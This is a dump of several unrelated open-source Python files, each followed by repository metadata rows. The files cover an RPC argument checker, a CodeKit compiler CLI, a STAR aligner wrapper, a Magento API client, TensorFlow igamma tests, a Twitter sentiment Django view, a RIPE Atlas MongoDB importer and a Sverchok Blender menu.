print('ERROR: %s argument %i (named %s in vRPCConvertParams) is not defined in dispatch table' % (cmdname, argidx, argname))
errors += 1
continue
if argname not in rargnames:
print('ERROR: %s argument %i is named %s in vRPCConvertParams but %s in dispatch table' % (cmdname, argidx, argname, rargnames), file=sys.stderr)
errors += 1
# Check for conflicts in vRPCConvertParams conversion
# All aliases for an argument must either be present in the
# conversion table, or not. Anything in between means an oversight
# and some aliases won't work.
for cmd in cmds:
for arg in cmd.args:
convert = [((cmd.name, arg.idx, argname) in mapping) for argname in arg.names]
if any(convert) != all(convert):
print('ERROR: %s argument %s has conflicts in vRPCConvertParams conversion specifier %s' % (cmd.name, arg.names, convert))
errors += 1
arg.convert = all(convert)
# Check for conversion difference by argument name.
# It is preferable for API consistency that arguments with the same name
# have the same conversion, so bin by argument name.
all_methods_by_argname = defaultdict(list)
converts_by_argname = defaultdict(list)
for cmd in cmds:
for arg in cmd.args:
for argname in arg.names:
all_methods_by_argname[argname].append(cmd.name)
converts_by_argname[argname].append(arg.convert)
for argname, convert in converts_by_argname.items():
if all(convert) != any(convert):
if argname in IGNORE_DUMMY_ARGS:
# these are testing or dummy, don't warn for them
continue
print('WARNING: conversion mismatch for argument named %s (%s)' %
(argname, list(zip(all_methods_by_argname[argname], converts_by_argname[argname]))))
sys.exit(errors > 0)
if __name__ == '__main__':
main()
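# Sketch of the kind of dispatch-table line process_commands() matches
# (a made-up example mirroring the regexp above):
#
#     { "blockchain",  "getblockcount",  &getblockcount,  {} },
#
# and of a conversion-table line process_mapping() matches:
#
#     { "setgenerate", 0, "generate" },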
|
mit
| 9,194,470,161,719,797,000
| 36.791139
| 157
| 0.570591
| false
| 3.874757
| false
| false
| false
|
gjo/python-codekitlang
|
codekitlang/command.py
|
1
|
1629
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import logging
import sys
from . import compiler
def _(s):
return s
def main():
parser = argparse.ArgumentParser(
prog='pykitlangc',
description=_('CodeKit Language Compiler.'),
)
parser.add_argument('src', nargs=1, metavar='SRC', help=_('input file'))
parser.add_argument('dest', nargs=1, metavar='DEST', help=_('output file'))
parser.add_argument(
'-f', '--framework-paths', metavar='DIR', action='append',
        help=_('path to search for include files (may be given multiple times)'),
)
parser.add_argument(
'--missing-file-behavior', metavar='BEHAVIOR', default='logonly',
choices=('ignore', 'logonly', 'exception'),
help=_('one of ignore, logonly, exception (default: logonly)'),
)
parser.add_argument(
'--missing-variable-behavior', metavar='BEHAVIOR', default='ignore',
choices=('ignore', 'logonly', 'exception'),
help=_('one of ignore, logonly, exception (default: ignore)'),
)
namespace = parser.parse_args()
options = vars(namespace)
src = options.pop('src')
dest = options.pop('dest')
logger = logging.getLogger('pykitlangc')
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO)
options['logger'] = logger
compiler_ = compiler.Compiler(**options)
try:
compiler_.generate_to_file(dest[0], src[0])
except compiler.CompileError as e:
print(e.to_message(), file=sys.stderr)
sys.exit(1)
if __name__ == '__main__': # pragma:nocover
main()
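# Example invocation (file names are hypothetical):
#
#     pykitlangc -f includes/ --missing-file-behavior exception src.kit out.html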
|
bsd-3-clause
| -6,925,022,318,885,198,000
| 30.326923
| 79
| 0.622468
| false
| 3.869359
| false
| false
| false
|
brainstorm/bcbio-nextgen
|
bcbio/ngsalign/star.py
|
1
|
7746
|
import os
import sys
import shutil
import subprocess
import contextlib
from collections import namedtuple
from bcbio.pipeline import config_utils
from bcbio.distributed.transaction import file_transaction, tx_tmpdir
from bcbio.utils import (safe_makedir, file_exists, is_gzipped)
from bcbio.provenance import do
from bcbio import utils
from bcbio.log import logger
from bcbio.pipeline import datadict as dd
from bcbio.ngsalign import postalign
from bcbio.bam import fastq
CLEANUP_FILES = ["Aligned.out.sam", "Log.out", "Log.progress.out"]
ALIGN_TAGS = ["NH", "HI", "NM", "MD", "AS"]
def align(fastq_file, pair_file, ref_file, names, align_dir, data):
if not ref_file:
logger.error("STAR index not found. We don't provide the STAR indexes "
"by default because they are very large. You can install "
"the index for your genome with: bcbio_nextgen.py upgrade "
"--aligners star --genomes genome-build-name --data")
sys.exit(1)
max_hits = 10
srna = True if data["analysis"].lower().startswith("smallrna-seq") else False
srna_opts = ""
if srna:
max_hits = 1000
srna_opts = "--alignIntronMax 1"
config = data["config"]
star_dirs = _get_star_dirnames(align_dir, data, names)
if file_exists(star_dirs.final_out):
data = _update_data(star_dirs.final_out, star_dirs.out_dir, names, data)
return data
star_path = config_utils.get_program("STAR", config)
fastq_files = " ".join([fastq_file, pair_file]) if pair_file else fastq_file
num_cores = dd.get_num_cores(data)
gtf_file = dd.get_gtf_file(data)
if ref_file.endswith("chrLength"):
ref_file = os.path.dirname(ref_file)
with file_transaction(data, align_dir) as tx_align_dir:
tx_star_dirnames = _get_star_dirnames(tx_align_dir, data, names)
tx_out_dir, tx_out_file, tx_out_prefix, tx_final_out = tx_star_dirnames
safe_makedir(tx_align_dir)
safe_makedir(tx_out_dir)
cmd = ("{star_path} --genomeDir {ref_file} --readFilesIn {fastq_files} "
"--runThreadN {num_cores} --outFileNamePrefix {tx_out_prefix} "
"--outReadsUnmapped Fastx --outFilterMultimapNmax {max_hits} "
"--outStd SAM {srna_opts} "
"--outSAMunmapped Within --outSAMattributes %s " % " ".join(ALIGN_TAGS))
cmd += _add_sj_index_commands(fastq_file, ref_file, gtf_file) if not srna else ""
cmd += " --readFilesCommand zcat " if is_gzipped(fastq_file) else ""
cmd += _read_group_option(names)
fusion_mode = utils.get_in(data, ("config", "algorithm", "fusion_mode"), False)
if fusion_mode:
cmd += (" --chimSegmentMin 12 --chimJunctionOverhangMin 12 "
"--chimScoreDropMax 30 --chimSegmentReadGapMax 5 "
"--chimScoreSeparation 5 "
"--chimOutType WithinSAM ")
strandedness = utils.get_in(data, ("config", "algorithm", "strandedness"),
"unstranded").lower()
if strandedness == "unstranded" and not srna:
cmd += " --outSAMstrandField intronMotif "
if not srna:
cmd += " --quantMode TranscriptomeSAM "
cmd += " | " + postalign.sam_to_sortbam_cl(data, tx_final_out)
run_message = "Running STAR aligner on %s and %s" % (fastq_file, ref_file)
do.run(cmd.format(**locals()), run_message, None)
print("hello")
data = _update_data(star_dirs.final_out, star_dirs.out_dir, names, data)
return data
StarOutDirs = namedtuple(
'StarOutDirs',
['out_dir', 'out_file', 'out_prefix', 'final_out']
)
def _get_star_dirnames(align_dir, data, names):
ALIGNED_OUT_FILE = "Aligned.out.sam"
out_prefix = os.path.join(align_dir, dd.get_lane(data))
out_file = out_prefix + ALIGNED_OUT_FILE
out_dir = os.path.join(align_dir, "%s_star" % dd.get_lane(data))
final_out = os.path.join(out_dir, "{0}.bam".format(names["sample"]))
return StarOutDirs(out_dir, out_file, out_prefix, final_out)
def _add_sj_index_commands(fq1, ref_file, gtf_file):
"""
    newer versions of STAR can generate splice junction databases on the fly;
this is preferable since we can tailor it to the read lengths
"""
if _has_sj_index(ref_file):
return ""
else:
rlength = fastq.estimate_maximum_read_length(fq1)
cmd = " --sjdbGTFfile %s " % gtf_file
cmd += " --sjdbOverhang %s " % str(rlength - 1)
return cmd
def _has_sj_index(ref_file):
"""this file won't exist if we can do on the fly splice junction indexing"""
return file_exists(os.path.join(ref_file, "sjdbInfo.txt"))
def _update_data(align_file, out_dir, names, data):
data = dd.set_work_bam(data, align_file)
data = dd.set_align_bam(data, align_file)
transcriptome_file = _move_transcriptome_file(out_dir, names)
data = dd.set_transcriptome_bam(data, transcriptome_file)
return data
def _move_transcriptome_file(out_dir, names):
out_file = os.path.join(out_dir, "{0}.transcriptome.bam".format(names["sample"]))
star_file = os.path.join(out_dir, os.pardir,
"{0}Aligned.toTranscriptome.out.bam".format(names["lane"]))
# if the out_file or the star_file doesn't exist, we didn't run the
# transcriptome mapping
if not file_exists(out_file):
if not file_exists(star_file):
return None
else:
shutil.move(star_file, out_file)
return out_file
def _read_group_option(names):
rg_id = names["rg"]
rg_sample = names["sample"]
rg_library = names["pl"]
rg_platform_unit = names["pu"]
rg_lb = ("LB:%s " % names.get("lb")) if names.get("lb") else ""
return (" --outSAMattrRGline ID:{rg_id} PL:{rg_library} "
"PU:{rg_platform_unit} SM:{rg_sample} {rg_lb}").format(**locals())
def _get_quality_format(config):
qual_format = config["algorithm"].get("quality_format", None)
if qual_format.lower() == "illumina":
return "fastq-illumina"
elif qual_format.lower() == "solexa":
return "fastq-solexa"
else:
return "fastq-sanger"
def remap_index_fn(ref_file):
"""Map sequence references to equivalent star indexes
"""
return os.path.join(os.path.dirname(os.path.dirname(ref_file)), "star")
def index(ref_file, out_dir, data):
"""Create a STAR index in the defined reference directory.
"""
(ref_dir, local_file) = os.path.split(ref_file)
gtf_file = dd.get_gtf_file(data)
if not utils.file_exists(gtf_file):
raise ValueError("%s not found, could not create a star index." % (gtf_file))
if not utils.file_exists(out_dir):
with tx_tmpdir(data, os.path.dirname(out_dir)) as tx_out_dir:
num_cores = dd.get_cores(data)
cmd = ("STAR --genomeDir {tx_out_dir} --genomeFastaFiles {ref_file} "
"--runThreadN {num_cores} "
"--runMode genomeGenerate --sjdbOverhang 99 --sjdbGTFfile {gtf_file}")
do.run(cmd.format(**locals()), "Index STAR")
if os.path.exists(out_dir):
shutil.rmtree(out_dir)
shutil.move(tx_out_dir, out_dir)
return out_dir
def get_star_version(data):
star_path = config_utils.get_program("STAR", dd.get_config(data))
cmd = "%s --version" % star_path
subp = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True)
with contextlib.closing(subp.stdout) as stdout:
for line in stdout:
if "STAR_" in line:
version = line.split("STAR_")[1].strip()
return version
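# Illustrative parse (format assumed from the "STAR_" split above): a
# "STAR --version" output line containing "STAR_2.5.2b" yields "2.5.2b".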
|
mit
| 9,177,149,942,006,414,000
| 40.42246
| 89
| 0.619287
| false
| 3.231539
| true
| false
| false
|
pauloacmelo/papelex_winthor
|
papelex_magento/customer.py
|
1
|
3621
|
# -*- coding: UTF-8 -*-
'''
magento.customer
Customer API for magento
:license: BSD, see LICENSE for more details
'''
from .api import API
class Customer(API):
"""
Customer API
Example usage::
from magento import Customer as CustomerAPI
with CustomerAPI(url, username, password) as customer_api:
return customer_api.list()
"""
__slots__ = ()
def list(self, filters=None):
"""
        Retrieve list of customers
:param filters: Dictionary of filters.
Format: `{<attribute>:{<operator>:<value>}}`
Example: `{'firstname':{'ilike':'sharoon'}}`
:return: List of dictionaries of matching records
"""
return self.call('customer.list', filters and [filters] or [{}])
def create(self, data):
"""
Create a customer using the given data
:param data: Dictionary of values
:return: Integer ID of new record
"""
return int(self.call('customer.create', [data]))
def info(self, id, attributes=None):
"""
Retrieve customer data
:param id: ID of customer
:param attributes: `List` of attributes needed
"""
if attributes:
return self.call('customer.info', [id, attributes])
else:
return self.call('customer.info', [id])
def update(self, id, data):
"""
Update a customer using the given data
:param id: ID of the customer record to modify
:param data: Dictionary of values
:return: Boolean
"""
return self.call('customer.update', [id, data])
def delete(self, id):
"""
Delete a customer
:param id: ID of customer to delete
:return: Boolean
"""
return self.call('customer.delete', [id])
class CustomerGroup(API):
"""
Customer Group API to connect to magento
"""
__slots__ = ()
def list(self):
"""
        Retrieve list of customers
:return: List of dictionaries of matching records
"""
return self.call('customer_group.list', [])
class CustomerAddress(API):
"""
Customer Address API
"""
__slots__ = ()
def list(self, customer_id):
"""
        Retrieve list of customer addresses
:param customer_id: ID of customer whose address needs to be fetched
:return: List of dictionaries of matching records
"""
return self.call('customer_address.list', [customer_id])
def create(self, customer_id, data):
"""
Create a customer using the given data
:param customer_id: ID of customer, whose address is being added
:param data: Dictionary of values (country, zip, city, etc...)
:return: Integer ID of new record
"""
return int(self.call('customer_address.create', [customer_id, data]))
def info(self, id):
"""
        Retrieve customer address data
        :param id: ID of the address
"""
return self.call('customer_address.info', [id])
def update(self, id, data):
"""
Update a customer address using the given data
:param id: ID of the customer address record to modify
:param data: Dictionary of values
:return: Boolean
"""
return self.call('customer_address.update', [id, data])
def delete(self, id):
"""
Delete a customer address
:param id: ID of address to delete
:return: Boolean
"""
return self.call('customer_address.delete', [id])
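# Minimal usage sketch (URL and credentials are placeholders, following the
# connection pattern shown in the Customer docstring above):
#
#     from magento import CustomerAddress
#     with CustomerAddress('http://shop.example.com/', 'apiuser', 'apikey') as api:
#         addresses = api.list(customer_id=1)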
|
mit
| -3,507,494,974,233,864,700
| 23.972414
| 77
| 0.570008
| false
| 4.410475
| false
| false
| false
|
OpenLocalMap/OpenLocalMap
|
Python Version/xyCoordsLLPGClass.py
|
1
|
1326
|
# OpenLocalMap OpenSource web mapping for local government
# Copyright (C) <2014> <Ben Calnan>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import queryClass
class xyCoordsLLPGClass:
def __init__(self, uprn):
self.UPRN = uprn
self.getXYquery()
def getXYquery(self):
##print queryClass.getXYofLLPGpoint(self.UPRN)
        self.xyQuery = queryClass.getXYofLLPGpoint(self.UPRN)
    def getXYCoordsLLPG(self):
        # DBconn and setStid are assumed to be provided by the wider
        # application; the fixes below only repair the missing self
        # references in the original code
        self.xy_DB = DBconn("LLPG")
        self.setStid(self.xyQuery)
        xy_row = self.xy_DB.getSingleRow()
        self.xyCoords = "{\"xyCoords\":[{\"X\":\"" + xy_row['X'] + "\",\"Y\":\"" + xy_row['Y'] + "\"}]}"
        return self.xyCoords
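# Minimal usage sketch (the UPRN value is a placeholder; assumes DBconn and
# setStid are provided by the wider application):
#
#     coords = xyCoordsLLPGClass('100012345678')
#     coords.getXYCoordsLLPG()  # -> '{"xyCoords":[{"X":"...","Y":"..."}]}'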
|
gpl-3.0
| -4,400,104,537,916,759,000
| 34.837838
| 108
| 0.665913
| false
| 3.55496
| false
| false
| false
|
devlights/try-python
|
trypython/stdlib/dis_/dis01.py
|
1
|
2422
|
# coding: utf-8
"""
This is a sample of the dis module.
"""
import dis
from trypython.common.commoncls import SampleBase
from trypython.common.commonfunc import hr
# noinspection SpellCheckingInspection
class Sample(SampleBase):
def exec(self):
##############################################
        # The dis module supports analysis of Python
        # bytecode.
        #
        # Broadly, there are two ways to use it:
        # 1) dis.dis()
        # 2) dis.Bytecode()
        #
        # 1) disassembles the given content and prints it;
        # if nothing is passed for the file argument, the
        # output goes to standard output.
        #
        # 2) is an API added in Python 3.4. It is invoked
        # much like 1), but instead of printing the result
        # immediately it wraps it in a Bytecode object and
        # returns it.
#
##############################################
listcomp_str = 'r = [x for x in range(1000000) if x % 2 == 0]'
forloop_str = '''
r = []
for x in range(1000000):
if x % 2 == 0:
r.append(x)
'''
###############################################
# dis.dis()
###############################################
hr('dis.dis(listcomp_str)')
dis.dis(listcomp_str)
hr('dis.dis(forloop_str)')
dis.dis(forloop_str)
###############################################
# dis.Bytecode()
#
        # An API added to the dis module in Python 3.4.
        # It keeps the code object and the result of
        # dis.code_info() internally, which makes it the
        # more convenient of the two.
###############################################
hr('dis.Bytecode(listcomp_str)')
listcomp_bytecode = dis.Bytecode(listcomp_str)
print(listcomp_bytecode.codeobj)
print(listcomp_bytecode.dis())
print(listcomp_bytecode.info())
hr('dis.Bytecode(forloop_str)')
forloop_bytecode = dis.Bytecode(forloop_str)
print(forloop_bytecode.codeobj)
print(forloop_bytecode.dis())
print(forloop_bytecode.info())
def go():
obj = Sample()
obj.exec()
|
mit
| 6,764,128,687,262,864,000
| 25.540541
| 70
| 0.471487
| false
| 2.505102
| false
| false
| false
|
jhseu/tensorflow
|
tensorflow/compiler/tests/special_math_test.py
|
1
|
3535
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for special math operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl import flags
from absl.testing import parameterized
import numpy as np
import scipy.special as sps
import six
from tensorflow.compiler.tests import xla_test
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
flags.DEFINE_bool('vary_seed', False,
('Whether to vary the PRNG seed unpredictably. '
'With --runs_per_test=N, produces N iid runs.'))
NUM_SAMPLES = int(1e3)
class IgammaTest(xla_test.XLATestCase, parameterized.TestCase):
def setUp(self):
if flags.FLAGS.vary_seed:
entropy = os.urandom(64)
if six.PY2:
answer = int(entropy.encode('hex'), 16)
else:
answer = int.from_bytes(entropy, 'big')
np.random.seed(answer)
super(IgammaTest, self).setUp()
@parameterized.parameters((np.float32, 1e-2, 1e-11),
(np.float64, 1e-4, 1e-30))
def testIgammaSmallValues(self, dtype, rtol, atol):
# Test values near zero.
x = np.random.uniform(
low=np.finfo(dtype).tiny, high=1., size=[NUM_SAMPLES]).astype(dtype)
a = np.random.uniform(
low=np.finfo(dtype).tiny, high=1., size=[NUM_SAMPLES]).astype(dtype)
expected_values = sps.gammainc(a, x)
with self.session() as sess:
with self.test_scope():
actual = sess.run(math_ops.igamma(a, x))
self.assertAllClose(expected_values, actual, atol=atol, rtol=rtol)
@parameterized.parameters((np.float32, 1e-2, 1e-11),
(np.float64, 1e-4, 1e-30))
def testIgammaMediumValues(self, dtype, rtol, atol):
    # Test medium-sized values.
x = np.random.uniform(low=1., high=100., size=[NUM_SAMPLES]).astype(dtype)
a = np.random.uniform(low=1., high=100., size=[NUM_SAMPLES]).astype(dtype)
expected_values = sps.gammainc(a, x)
with self.session() as sess:
with self.test_scope():
actual = sess.run(math_ops.igamma(a, x))
self.assertAllClose(expected_values, actual, atol=atol, rtol=rtol)
@parameterized.parameters((np.float32, 2e-2, 1e-5), (np.float64, 1e-4, 1e-30))
def testIgammaLargeValues(self, dtype, rtol, atol):
    # Test large values.
x = np.random.uniform(
low=100., high=int(1e4), size=[NUM_SAMPLES]).astype(dtype)
a = np.random.uniform(
low=100., high=int(1e4), size=[NUM_SAMPLES]).astype(dtype)
expected_values = sps.gammainc(a, x)
with self.session() as sess:
with self.test_scope():
actual = sess.run(math_ops.igamma(a, x))
self.assertAllClose(expected_values, actual, atol=atol, rtol=rtol)
if __name__ == '__main__':
os.environ['XLA_FLAGS'] = '--xla_cpu_enable_fast_math=false'
test.main()
|
apache-2.0
| -5,683,867,419,198,845,000
| 34.707071
| 80
| 0.655446
| false
| 3.412162
| true
| false
| false
|
rahulpsd18/twitter-sentiment-analysis
|
website/views.py
|
1
|
2143
|
from django.shortcuts import render
from django.http import HttpResponse
from django.utils.datastructures import MultiValueDictKeyError
import os
import requests
import tweepy
from textblob import TextBlob
### For logging purposes to console; disable in production
# import logging
# logger = logging.getLogger(__name__)
def twitterHero(data,size):
consumer_key=os.environ.get('CONSUMER_KEY')
consumer_secret=os.environ.get('CONSUMER_SECRET')
access_token=os.environ.get('ACCESS_TOKEN')
access_token_secret=os.environ.get('ACCESS_TOKEN_SECRET')
auth=tweepy.OAuthHandler(consumer_key,consumer_secret)
auth.set_access_token(access_token,access_token_secret)
api=tweepy.API(auth)
S=[]
counter=[0,0,0] # positive, negative, neutral
for tweet in tweepy.Cursor(api.search, q=data, rpp=100, count=20, result_type="recent", include_entities=True, lang="en").items(size):
# logger.log(100,tweet) # MASSIVE DATA DUMP for debugging
analysis=TextBlob(tweet.text)
if analysis.sentiment.polarity > 0:
res='positive'
counter[0]+=1
elif analysis.sentiment.polarity == 0:
res='neutral'
counter[2]+=1
else:
res='negative'
counter[1]+=1
S.append((tweet.text,analysis.sentiment,res,tweet.user.name,tweet.user.profile_image_url_https,tweet.user.screen_name))
positivePer=(counter[0]/size)*100
negativePer=(counter[1]/size)*100
neutralPer=(counter[2]/size)*100
S.append((positivePer,negativePer,neutralPer))
return S
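# Return shape of twitterHero: each entry of S is
# (text, sentiment, label, user_name, avatar_url, screen_name); the final
# element is a (positive%, negative%, neutral%) tuple, which the caller in
# form_data() pops off before rendering.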
def index(request):
return render(request,'website/home.html',{})
def form_data(request):
try:
data=request.POST['q']
size=int(request.POST['size'])
except MultiValueDictKeyError:
data='data science'
size=50
if data=='':
data='data science'
S=twitterHero(data,size)
# logger.log(100,"Called function.")
posPer,negPer,ntrPer=S[-1][0],S[-1][1],S[-1][2]
del S[-1]
return render(request,'website/index.html',{'data':S,'search':data,'posPer':posPer,'negPer':negPer,'ntrPer':ntrPer})
|
mit
| -6,747,758,861,474,120,000
| 31.469697
| 138
| 0.669622
| false
| 3.380126
| false
| false
| false
|
romain-fontugne/ripeAtlasDetector
|
dataManipulation/mongoimport.py
|
1
|
2772
|
import os
import sys
import json
import glob
import pymongo
import datetime
import gzip
# def importMongo(path,collection, db=None):
# if db is None:
# client = pymongo.MongoClient("mongodb-ikebukuro")
# db = client.atlas
# col = db[collection]
# for filename in glob.glob(path):
# fi = open(filename)
# data = json.load(fi)
# print "%s: %s documents" % (filename, len(data))
# col.insert_many(data)
def importRangeOfDates(start, end, msmType, af=""):
if msmType != "builtin" and msmType != "anchor":
print "measurement type unknown!"
return
#TODO allow only af==4 or 6
    # thus data is stored in collections traceroute4 or traceroute6
if af=="":
aflabel = "4"
else:
aflabel = af
client = pymongo.MongoClient("mongodb-ikebukuro")
db = client.atlas
nbDays = (end-start).days
dateRange = [start+datetime.timedelta(x) for x in range(nbDays)]
for date in dateRange:
# colName = "traceroute_{year}_{month:02d}_{day:02d}".format(
colName = "traceroute{af}_{year}_{month:02d}_{day:02d}".format( af=af, year=date.year, month=date.month, day=date.day)
col = db[colName]
if date < datetime.datetime(2015,10,13):
# Data from Emile
filename = "/export/ripe/atlas/traceroute/{year}-{month:02d}-{day:02d}.gz".format(
year=date.year, month=date.month, day=date.day)
msmIdFile = "./%sMsmIdsv%s.txt" % (msmType, aflabel)
os.system("zcat %s | grep -f %s | mongoimport -h mongodb-ikebukuro -d atlas -c %s " % (
filename, msmIdFile, colName))
col.create_index("timestamp", background=True)
else:
            # data were already stored locally when downloaded
            # Downloaded data
path = "../data/ipv{aflabel}/{msmType}/{year}/{month}/{year}-{month:02d}-{day:02d}*.json.gz".format(
aflabel=aflabel, msmType=msmType, year=date.year, month=date.month, day=date.day)
files = glob.glob(path)
files.sort() # insert data in chronological order
for filename in files:
fi = gzip.open(filename)
data = json.load(fi)
if len(data):
print filename
col.insert_many(data)
else:
print "%s is empty!" % filename
col.create_index("timestamp", background=True)
if __name__ == "__main__":
pass
# Don't use this:
# if len(sys.argv) < 3:
# print "usage: %s filesPattern collection" % sys.argv[0]
# else:
# importMongo(sys.argv[1], sys.argv[2])
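# Example call (dates are illustrative): import built-in IPv4 traceroute
# results for the first week of October 2015.
#
#     importRangeOfDates(datetime.datetime(2015, 10, 1),
#                        datetime.datetime(2015, 10, 8), "builtin")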
|
gpl-2.0
| 6,064,794,230,779,179,000
| 31.611765
| 126
| 0.557359
| false
| 3.586028
| false
| false
| false
|
nortikin/sverchok
|
ui/nodeview_rclick_menu.py
|
1
|
12854
|
# This file is part of project Sverchok. It's copyrighted by the contributors
# recorded in the version control history of the file, available from
# its original location https://github.com/nortikin/sverchok/commit/master
#
# SPDX-License-Identifier: GPL3
# License-Filename: LICENSE
import bpy
from sverchok.utils.sv_node_utils import frame_adjust
from sverchok.menu import draw_add_node_operator
from sverchok.ui.presets import node_supports_presets, apply_default_preset
from sverchok.core.sockets import SvCurveSocket, SvSurfaceSocket, SvStringsSocket, SvSolidSocket
supported_mesh_viewers = {'SvMeshViewer', 'SvViewerDrawMk4'}
# for rclick i want convenience..
common_nodes = [
['GenVectorsNode', 'VectorsOutNode'],
['SvNumberNode', 'SvGenNumberRange'],
['SvScalarMathNodeMK4', 'SvVectorMathNodeMK3'],
['SvComponentAnalyzerNode'],
['---', 'NodeReroute', 'ListLengthNode']
]
def connect_idx_viewer(tree, existing_node, new_node):
# get connections going into vdmk2 and make a new idxviewer and connect the same sockets to that.
links = tree.links
links.new(existing_node.inputs[0].other, new_node.inputs[0])
def valid_active_node(nodes):
if nodes:
# a previously active node can remain active even when no nodes are selected.
if nodes.active and nodes.active.select:
return nodes.active
def has_outputs(node):
return node and len(node.outputs)
def get_output_sockets_map(node):
"""
because of inconsistent socket naming, we will use pattern matching (ignoring capitalization)
- verts: verts, vers, vertices, vectors, vecs (ver, vec)
- edges: edges, edgs, edgpol (edg)
- faces: faces, poly, pols, edgpol, (pol, fac)
For curves and surfaces checks if they belong to the corresponding class
> generally the first 3 outputs of a node will contain these
> generally if a node outputs polygons, it won't be necessary to connect edges
> if a node doesn't output polygons, only edges need to be connected
if the following code is in master, it will find the vast majority of mesh sockets,
in the case that it does not, dedicated lookup-tables for specific nodes are a consideration.
"""
output_map = {}
got_verts = False
got_edges = False
got_faces = False
got_curves = False
got_surface = False
got_solid = False
# we can surely use regex for this, but for now this will work.
for socket in node.outputs:
if socket.hide or socket.hide_safe:
continue
socket_name = socket.name.lower()
if not got_verts and ('ver' in socket_name or 'vec' in socket_name):
output_map['verts'] = socket.name
got_verts = True
elif not got_edges and 'edg' in socket_name and isinstance(socket, SvStringsSocket):
output_map['edges'] = socket.name
got_edges = True
elif not got_faces and ('face' in socket_name or 'pol' in socket_name) and isinstance(socket, SvStringsSocket):
output_map['faces'] = socket.name
got_faces = True
elif not got_curves and isinstance(socket, SvCurveSocket):
output_map['curve'] = socket.name
got_curves = True
elif not got_surface and isinstance(socket, SvSurfaceSocket):
output_map['surface'] = socket.name
got_surface = True
elif not got_solid and isinstance(socket, SvSolidSocket):
output_map['solid'] = socket.name
got_solid = True
return output_map
def offset_node_location(existing_node, new_node, offset):
new_node.location = existing_node.location.x + offset[0] + existing_node.width, existing_node.location.y + offset[1]
def conect_to_3d_viewer(tree):
if hasattr(tree.nodes.active, 'viewer_map'):
view_node(tree)
else:
add_connection(tree, bl_idname_new_node="SvViewerDrawMk4", offset=[60, 0])
def view_node(tree):
'''viewer map is a node attribute to inform to the operator how to visualize
the node data
it is a list with two items.
The first item is a list with tuples, every tuple need to have the node bl_idanme and offset to the previous node
The second item is a list with tuples, every tuple indicates a link.
The link is defined by two pairs of numbers, referring to output and input
The first number of every pair indicates the node being 0 the active node 1 the first needed node and so on
The second nmber of every pair indicates de socket index.
So to say: create a Viewer Draw with a offset of 60,0 and connect the first output to the vertices input
the node would need to have this:
viewer_map = [
("SvViewerDrawMk4", [60, 0])
], [
([0, 0], [1, 0])
]
'''
nodes = tree.nodes
links = tree.links
existing_node = nodes.active
node_list = [existing_node]
output_map = existing_node.viewer_map
previous_state = tree.sv_process
tree.sv_process = False
for node in output_map[0]:
bl_idname_new_node, offset = node
new_node = nodes.new(bl_idname_new_node)
apply_default_preset(new_node)
offset_node_location(node_list[-1], new_node, offset)
frame_adjust(node_list[-1], new_node)
node_list.append(new_node)
for link in output_map[1]:
output_s, input_s = link
links.new(node_list[output_s[0]].outputs[output_s[1]],
node_list[input_s[0]].inputs[input_s[1]])
tree.sv_process = previous_state
tree.update()
def add_connection(tree, bl_idname_new_node, offset):
nodes = tree.nodes
links = tree.links
output_map = get_output_sockets_map(nodes.active)
existing_node = nodes.active
if isinstance(bl_idname_new_node, str):
# single new node..
new_node = nodes.new(bl_idname_new_node)
apply_default_preset(new_node)
offset_node_location(existing_node, new_node, offset)
frame_adjust(existing_node, new_node)
outputs = existing_node.outputs
inputs = new_node.inputs
if existing_node.bl_idname in supported_mesh_viewers and bl_idname_new_node == 'SvIDXViewer28':
new_node.draw_bg = True
connect_idx_viewer(tree, existing_node, new_node)
elif bl_idname_new_node == 'SvStethoscopeNodeMK2':
# we can't determine thru cursor location which socket was nearest the rightclick
# maybe in the future.. or if someone does know :)
for socket in outputs:
if socket.hide:
continue
# connect_stethoscope to first visible output socket of active node
links.new(socket, inputs[0])
break
tree.update() # without this the node won't show output until an update is triggered manually
# existing_node.process_node(None)
elif bl_idname_new_node == 'SvViewerDrawMk4':
previous_state = tree.sv_process
tree.sv_process = False
if 'verts' in output_map:
links.new(outputs[output_map['verts']], inputs[0])
if 'faces' in output_map:
links.new(outputs[output_map['faces']], inputs[2])
if 'edges' in output_map:
links.new(outputs[output_map['edges']], inputs[1])
elif 'curve' in output_map:
eval_node = nodes.new('SvExEvalCurveNode')
apply_default_preset(eval_node)
offset_node_location(existing_node, eval_node, offset)
frame_adjust(existing_node, eval_node)
offset_node_location(eval_node, new_node, offset)
frame_adjust(eval_node, new_node)
links.new(outputs[output_map['curve']], eval_node.inputs[0])
links.new(eval_node.outputs[0], inputs[0])
links.new(eval_node.outputs[1], inputs[1])
elif 'surface' in output_map:
eval_node = nodes.new('SvExEvalSurfaceNode')
apply_default_preset(eval_node)
offset_node_location(existing_node, eval_node, offset)
frame_adjust(existing_node, eval_node)
offset_node_location(eval_node, new_node, offset)
frame_adjust(eval_node, new_node)
links.new(outputs[output_map['surface']], eval_node.inputs[0])
links.new(eval_node.outputs[0], inputs[0])
links.new(eval_node.outputs[1], inputs[1])
links.new(eval_node.outputs[2], inputs[2])
elif 'solid' in output_map:
tree.nodes.remove(new_node)
new_node = nodes.new('SvSolidViewerNode')
apply_default_preset(new_node)
offset_node_location(existing_node, new_node, offset)
frame_adjust(existing_node, new_node)
links.new(outputs[output_map['solid']], new_node.inputs[0])
tree.sv_process = previous_state
tree.update()
# existing_node.process_node(None)
else:
...
